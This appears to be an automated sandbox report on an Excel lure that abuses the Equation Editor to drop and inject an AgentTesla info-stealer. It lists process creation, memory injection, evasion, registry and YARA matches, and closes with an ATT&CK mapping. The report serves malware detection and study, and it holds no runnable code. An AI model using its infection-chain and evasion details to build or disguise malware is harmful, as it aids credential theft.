                Source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Code function: 5_2_001A3540
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Code function: 5_2_007921E2
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77620000 page execute and read and write
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77740000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Memory allocated: 77620000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Memory allocated: 77740000 page execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Memory allocated: 77620000 page execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Memory allocated: 77740000 page execute and read and write
                Source: Contract - Wipak Oy.xlsx | Virustotal: Detection: 53%
                Source: Contract - Wipak Oy.xlsx | ReversingLabs: Detection: 41%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Code function: 6_2_001BAAB6 AdjustTokenPrivileges
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Code function: 6_2_001BAA7F AdjustTokenPrivileges
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Contract - Wipak Oy.xlsx
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRA67B.tmp
                Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@8/6@2/3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: Contract - Wipak Oy.xlsx | OLE indicator, Workbook stream: true
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                Source: Contract - Wipak Oy.xlsx | Initial sample: OLE zip file path = xl/media/image1.png
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Contract - Wipak Oy.xlsx | Static file information: File size 2819080 > 1048576
                Source: Binary string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\powershell_ise.pdbw source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdbD source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 9C:\Win.pdbSys source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: .pdbN source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: indows\symbols\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\System.Activities.pdb source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996241614.000000000060A000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000000.992431011.0000000000FF2000.00000020.00000001.01000000.00000005.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, qGTGx[1].exe.2.dr
                Source: Binary string: T3npC:\Windows\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000002.1027747753.000000000478D000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: indows\powershell_ise.pdbpdbise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Contract - Wipak Oy.xlsx | Initial sample: OLE indicators vbamacros = False

                Data Obfuscation

                Source: qGTGx[1].exe.2.dr, Activities/Form1.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, Activities/Form1.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.0.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.ff0000.0.unpack, Activities/Form1.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe TID: 948 Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe TID: 2168 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                Source: EQNEDT32.EXE Binary or memory string: 2fhpwWhMzjGGhXHCBPqBT8Ei3z3FkNlhlTNT0KIVi4hgFSqX8fo3TEXqTOtYFYDVy3zW7FoA6fY57dub9xwiMyD8dpsjQy7ApwykvJ8eJ5FEz5NgOodxlNAsgqNYuhOyVdiw5YAEUpBuVqB31kHYMTHMlxqnMlxD8ictG0pBnRluKwCzCKIHnHTr4idFSAg9sf6M7h2nNSO06QMl435wireejcCgpxU6u3Z8IefLPPTzUIYgnT4HoDi1uEut9BIJMOQz
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process token adjusted: Debug
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_038A8C90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process queried: DebugPort (2 occurrences)
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 402000
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 436000
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 438000
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 7EFDE008
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory allocated: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Queries volume information: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe VolumeInformation
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR

                MITRE ATT&CK Matrix (one line per tactic; the digits in parentheses are the signature counts the report shows next to a technique)

                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Scripting (1); Exploitation for Client Execution (23); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                Privilege Escalation: Access Token Manipulation (1); Process Injection (311); Extra Window Memory Injection (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                Defense Evasion: Masquerading (1); Modify Registry (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (311); Scripting (1); Software Packing (11); Extra Window Memory Injection (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: Query Registry (1); Security Software Discovery (11); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Network Sniffing; Network Service Scanning; System Network Connections Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
